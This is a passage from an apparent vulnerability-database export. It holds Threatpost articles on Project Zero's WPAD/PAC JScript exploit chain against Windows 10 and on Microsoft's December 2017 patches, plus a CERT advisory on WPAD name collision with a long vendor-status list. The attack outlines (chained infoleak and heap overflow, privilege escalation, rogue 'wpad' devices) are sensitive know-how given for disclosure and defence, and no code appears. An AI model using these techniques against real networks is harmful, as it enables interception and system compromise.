identified by Context Information Security. 
The technique allowed an attacker to see the entire URL of every site visited even if the traffic is protected with HTTPS encryption.\n\nGoogle\u2019s Project Zero team took WPAD/PAC attacks a step further.\n\n\u201cAs far as we know, this is the first time that an attack against WPAD is demonstrated that results in the complete compromise of the WPAD user\u2019s machine,\u201d researchers said.\n\nWhat Project Zero researchers identified was a new attack vector that directly attacks the Windows JScript engine that interprets the JavaScript PAC files, commented Paul Stone, security consultant at Context Information Security. \u201cThis is a much more powerful and technically complex attack,\u201d he said.\n\nProject Zero\u2019s focus was on identifying new vulnerabilities in the version of JScript.dll used by the WPAD service. ([CVE-2017-11810](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11810>), [CVE-2017-11903](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11903>), [CVE-2017-11793](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11903>), [CVE-2017-11890](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11890>), [CVE-2017-11907](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11907>), [CVE-2017-11855](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11907>) and [CVE-2017-11906](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11906>))\n\nFive of the vulnerabilities outlined by Project Zero on Monday were patched last week as part of [Microsoft\u2019s Patch Tuesday](<https://threatpost.com/microsoft-december-patch-tuesday-update-fixes-34-bugs/129154/>). 
The additional two were [patched in October](<https://threatpost.com/microsoft-patches-office-bug-actively-being-exploited/128367/>) by Microsoft.\n\n\u201cIn recent years, browser exploits have mutated from being primarily DOM-oriented to targeting Javascript engines directly, so the mere mention that we can get Javascript execution over the network without the browser was motivating,\u201d wrote co-authors of the Project Zero report Ivan Fratric, Thomas Dullien, James Forshaw and Steven Vittitoe.\n\nResearchers chained two specific JScript bugs (an infoleak and a heap overflow) and leveraged several other techniques (such as return-oriented programming) to bypass Windows security mitigations. Next, researchers used a privilege escalation technique to move from the Local Service account (where the WPAD service runs, but doesn\u2019t have many permissions) to SYSTEM, according to an analysis of the technique by Stone.\n\n\u201cThe chain requires all its links in order to work, but still, in my opinion the memory read primitive (out-of-bounds read) is the enabler to all the other steps, and has usability beyond this particular chain,\u201d said Amit Klein, vice president of security research at SafeBreach.\n\nDespite the fact Microsoft has patched against this type of attack, Project Zero researchers agree with Klein\u2019s assessment.\n\n\u201cSince the bugs are now fixed, does this mean we are done and can go home? Unlikely. Although we spent a fair amount of time, effort and compute power on finding jscript.dll bugs, we make no claims that we found all of them. In fact, where there are 7 bugs, there is likely to be an 8th,\u201d Project Zero researchers wrote.\n\nResearchers recommend Microsoft users disable WPAD by default and sandbox the JScript interpreter inside the WPAD service.\n\nResearchers point out that Windows isn\u2019t the only software that implements WPAD. However, other implementations in other operating systems don\u2019t enable it by default. 
They also note, \u201cGoogle Chrome also has a WPAD implementation, but in Chrome\u2019s case, evaluating the JavaScript code from the PAC file happens inside a sandbox.\u201d\n", "cvss3": {}, "published": "2017-12-19T11:00:13", "type": "threatpost", "title": "Project Zero Chains Bugs for \u2018aPAColypse Now\u2019 Attack on Windows 10", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11793", "CVE-2017-11810", "CVE-2017-11855", "CVE-2017-11890", "CVE-2017-11903", "CVE-2017-11906", "CVE-2017-11907"], "modified": "2017-12-19T11:00:13", "id": "THREATPOST:889F51C6964835BFE33F9D16F1C53205", "href": "https://threatpost.com/project-zero-chains-bugs-for-apacolypse-now-attack-on-windows-10/129193/", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:00", "description": "Microsoft patched 34 vulnerabilities that are part of its December Patch Tuesday release. A total of 20 vulnerabilities were rated critical and another 12 were rated important. Impacted are Internet Explorer, Microsoft Edge, Microsoft Windows, Microsoft Office, SharePoint and Exchange.\n\nNotable patches include two ([CVE-2017-11937](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11937>) and [CVE-2017-11940](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11940>)) fixes impacting Microsoft\u2019s Malware Protection Engine (MPE). Both [remote code execution vulnerabilities](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11937>) became known last week via research by the UK National Cyber Security Centre. Both were patched last week.\n\n\u201cThese MPE vulnerabilities also affect Exchange Server, so back-end administrators do have some work to do this month,\u201d said Greg Wiseman, senior security researcher at Rapid7.\n\n\u201cThe biggest thing going on this month are bugs relating to Internet Explorer. 
Over half the CVEs this month are affecting IE and Edge,\u201d said Chris Goettl, product manager, Ivanti. Over twenty of the 34 vulnerabilities are classified as a \u201cscripting engine memory corruption vulnerability\u201d impacting Microsoft browsers.\n\nOne of the scripting engine memory corruption vulnerabilities ([CVE-2017-11907](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11907>)) is a remote code execution bug that exists when IE improperly accesses objects in memory. \u201cAn attacker could host a specially crafted website designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website,\u201d [wrote Microsoft](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11907>). A successful exploit of the vulnerability gives the attacker the same user rights as the current user.\n\n\u201cIt doesn\u2019t take sophisticated social engineering tactics to convince most users to visit a malicious web page, or a legitimate, but compromised, website (as in a watering hole attack). If the user is browsing with an unpatched version of Internet Explorer or Edge, an attacker could execute arbitrary code. If the user has administrative rights, it\u2019s game over and the attacker could take full control of the system,\u201d Wiseman said.\n\nSecurity experts are also recommending that admins prioritize a patch for a Microsoft Excel remote code execution vulnerability ([CVE-2017-11935](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-11935>)) affecting Microsoft Office 2016. \u201cDue to an error in the way Microsoft Office improperly handles objects in memory while parsing specially crafted files,\u201d according to the CVE description. A remote attacker can exploit this issue by enticing a victim to open a specially crafted file, according to the CVE record.\n\n\u201cThis vulnerability gives the attacker full control of the system. 
All I need to do is convince somebody to either open an attachment or come to my specially crafted website and download some content,\u201d Goettl said. \u201cClick-rates today are high. Users are still the weakest security link. This is probably the one vulnerability that I would say is most likely to be exploited this month.\u201d\n\nMicrosoft said none of the security issues that are part of Patch Tuesday security bulletin have been publicly disclosed or exploited.\n\nMeanwhile researchers at the Zero Day Initiative are recommending special attention to a Windows information disclosure vulnerability bug ([CVE-2017-11927](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11927>)). \u201cThis bug takes us all the way back to the early days of Internet Explorer and CHM (compressed help) files. This patch resolves an information disclosure vulnerability in the Windows its:// protocol handler,\u201d [notes ZDI in a blog post](<https://www.thezdi.com/blog/2017/12/12/the-december-2017-security-update-review>).\n\nMicrosoft describes the [information disclosure vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11927>) as a bug that exists when the Windows its:// protocol handler \u201cunnecessarily sends traffic to a remote site in order to determine the zone of a provided URL.\u201d Doing so could inadvertently expose sensitive user information to a malicious site.\n\n\u201cAn attacker who successfully tricked a user into disclosing the user\u2019s NTLM hash could attempt a brute-force attack to disclose the corresponding hash password,\u201d Microsoft wrote.\n", "cvss3": {}, "published": "2017-12-12T17:12:36", "type": "threatpost", "title": "Microsoft December Patch Tuesday Update Fixes Six Critical Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11907", "CVE-2017-11927", "CVE-2017-11935", "CVE-2017-11937", "CVE-2017-11940"], "modified": "2017-12-12T17:12:36", "id": 
"THREATPOST:B332E36B927835B6FDC7AD4DB93CE28C", "href": "https://threatpost.com/microsoft-december-patch-tuesday-update-fixes-34-bugs/129154/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2021-09-28T17:49:57", "description": "### Overview\n\nAutomatic DNS registration and autodiscovery functionality provides an opportunity for the misconfiguration of networks, resulting in a loss of confidentiality and integrity of the network if an attacker on the network adds a specially configured proxy device.\n\n### Description\n\nThe Web Proxy Automatic Discovery (WPAD) protocol is used to automatically provide proxy configuration information to devices on a network. Clients issue a special DHCP request to obtain the information for the proxy configuration, but will fall back on a DNS request to one of several standardized URLs making use of the subdomain name of \u201cwpad\u201d if a DHCP response is unavailable.\n\nAn attacker with local area network (LAN) access may be able to add a device with the name \u201cwpad\u201d to the network, which may produce a collision with a standardized WPAD DNS name. Many customer premise home/office routers (including, but not limited to, Google Wifi and Ubiquiti UniFi) automatically register device names as DNS A records on the LAN, which may allow an attacker to utilize a specially named and configured device to act as a WPAD proxy configuration server. The attacker-served proxy configuration can result in the loss of confidentiality and integrity of any network activity by any device that utilizes WPAD. \n \nOther autodiscovery names such as ISATAP may also be exploitable. \n \n--- \n \n### Impact\n\nAn attacker, with access to the network, could add a malicious device to the network with the name \"WPAD\". 
This attacker may be able to utilize DNS auto-registration and auto-discovery to act as a proxy for victims on the network, resulting in a loss of confidentiality and integrity of network activity. \n \n--- \n \n### Solution\n\nHome/office LAN/WLAN routers should not auto-register to their local DNS the magic names related to auto-configuration, and auto-discovery features should not accept mDNS-based names as authoritative sources. \n \nApply the vendor patch. \n \n--- \n \n### Vendor Information\n\n598349\n\n### ADTRAN Affected\n\nNotified: July 18, 2018 Updated: September 04, 2018 \n\n**Statement Date: August 30, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nADTRAN has affected products and their advisory will be available at the vendor web site.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://supportforums.adtran.com/docs/DOC-9269>\n\n### MikroTik Affected\n\nNotified: July 18, 2018 Updated: September 19, 2018 \n\n**Statement Date: September 10, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Pi-Hole Affected\n\nUpdated: October 01, 2018 \n\n**Statement Date: September 08, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Synology Affected\n\nNotified: July 18, 2018 Updated: September 05, 2018 \n\n**Statement Date: July 20, 2018**\n\n### Status\n\nAffected\n\n### Vendor 
Statement\n\nSynology has prepared updates to the majority of their products to fix this vulnerability. Please check [`https://www.synology.com/en-global/support/security/Synology_SA_18_53`](<https://www.synology.com/en-global/support/security/Synology_SA_18_53>).\n\n### Vendor References\n\n * [httpDSM6.2.1-23824](<httpDSM6.2.1-23824>)\n * <https://www.synology.com/en-us/releaseNote/RT2600ac\nSRM1.1.7-6941-2>\n * <https://www.synology.com/en-us/releaseNote/FS3017>\n\n### Addendum\n\nSynology has released updates to our majority products for fixing the vulnerability: \nList of affected products: <https://www.synology.com/en-global/support/security/Synology_SA_18_53> \n\\- DSM 6.2.1-23824 (<https://www.synology.com/en-us/releaseNote/FS3017>) \n\\- SRM 1.1.7-6941-2 (<https://www.synology.com/en-us/releaseNote/RT2600ac>) \n \nWe will publish a security advisory after public disclosure. Thank you. \n \n\\- Synology Security Team. \n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23598349 Feedback>).\n\n### TippingPoint Technologies Inc. Affected\n\nNotified: July 18, 2018 Updated: October 23, 2018 \n\n**Statement Date: October 08, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`The WPAD attack mechanism is not filterable by TippingPoint. However, the Jscript payload is filterable. 
\n \nHere is the list of JS vulnerabilities from Project Zero + our filters \n \n--------------------------------------- \n| Google ID | CVE | SigKB | \n--------------------------------------- \n| 1376 | CVE-2017-11903 | 30079 | \n| 1340 | CVE-2017-11810 | 29707 | \n| 1381 | CVE-2017-11793 | 29705 | \n| 1369 | CVE-2017-11890 | 30068 | \n| 1383 | CVE-2017-11907 | 30081 | \n| 1378 | CVE-2017-11855 | 29918 | \n| 1382 | CVE-2017-11906 | - | \n---------------------------------------`\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ubiquiti Networks Affected\n\nNotified: July 18, 2018 Updated: September 06, 2018 \n\n**Statement Date: September 05, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe recently launched UniFi Security Gateway firmware (4.4.28) that fix the vulnerability \"VU#598349\":\n\n \n<https://community.ubnt.com/t5/UniFi-Updates-Blog/USG-Firmware-v4-4-28-now-available/ba-p/2482349>. \n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://community.ubnt.com/t5/UniFi-Updates-Blog/USG-Firmware-v4-4-28-now-available/ba-p/2482349>\n\n### Ceragon Networks Inc Not Affected\n\nNotified: July 18, 2018 Updated: August 22, 2018 \n\n**Statement Date: August 02, 2018**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nNot Affected.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Check Point Software Technologies Not Affected\n\nNotified: July 18, 2018 Updated: July 20, 2018 \n\n**Statement Date: July 19, 2018**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`Check Point Software Technologies is not vulnerable to this.`\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Juniper Networks Not Affected\n\nNotified: July 18, 2018 Updated: July 20, 
2018 \n\n**Statement Date: July 19, 2018**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nThank you for sending us this report. As per our initial assessment, Juniper routers are unaffected since they do not consider host names provided in DHCP requests. If our devices are found vulnerable we will take steps to fix them and publish advisories on or after public disclosure of this issue.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### NLnet Labs Not Affected\n\nNotified: July 18, 2018 Updated: July 23, 2018 \n\n**Statement Date: July 23, 2018**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`Since NSD does not have DHCP DNS registration and autodiscovery functionality, we need to take no action. So NSD is not vulnerable. `\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### 3com Inc Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### 8e6 Technologies Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### A10 Networks Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ACCESS Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe 
are not aware of further vendor information regarding this vulnerability.\n\n### ANTlabs Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ARRIS Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ASP Linux Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### AT&T Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### AVM GmbH Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Actelis Networks Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Actiontec Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not 
aware of further vendor information regarding this vulnerability.\n\n### Aerohive Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### AhnLab Inc Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### AirWatch Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Akamai Technologies, Inc. Unknown\n\nNotified: July 23, 2018 Updated: July 23, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Alcatel-Lucent Enterprise Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Alpha Networks Inc Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Alpine Linux Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the 
vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Alvarion Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Amazon Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Android Open Source Project Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Aperto Networks Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Appgate Network Security Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Apple Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Arch Linux Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not 
received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Arista Networks, Inc. Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Aruba Networks Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### AsusTek Computer Inc. Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Atheros Communications, Inc. Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Avaya, Inc. Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Barnes and Noble Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Barracuda Networks Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Belkin, Inc. Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Bell Canada Enterprises Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Bit9 Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### BlackBerry Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this
vulnerability.

### Bloxx Ltd Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Blue Coat Systems Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### BlueCat Networks, Inc. Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Blunk Microsystems Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Broadcom Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Brocade Communication Systems Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### BullGuard Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware
of further vendor information regarding this vulnerability.

### CA Technologies Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### CMX Systems Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Cambium Networks Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### CentOS Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Cirpack Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Cisco Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Comcast Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware
of further vendor information regarding this vulnerability.

### Command Software Systems Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Contiki OS Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### CoreOS Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Cradlepoint Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Cricket Wireless Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### D-Link Systems, Inc. Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Debian GNU/Linux Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Dell Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Dell EMC Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Dell SecureWorks Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### DesktopBSD Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Deutsche Telekom Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this
vulnerability.

### Devicescape Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Digi International Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### DragonFly BSD Project Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### ENEA Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### EfficientIP SAS Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Ericsson Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Espressif Systems Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor
information regarding this vulnerability.

### European Registry for Internet Domains Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Express Logic Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Extreme Networks Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status
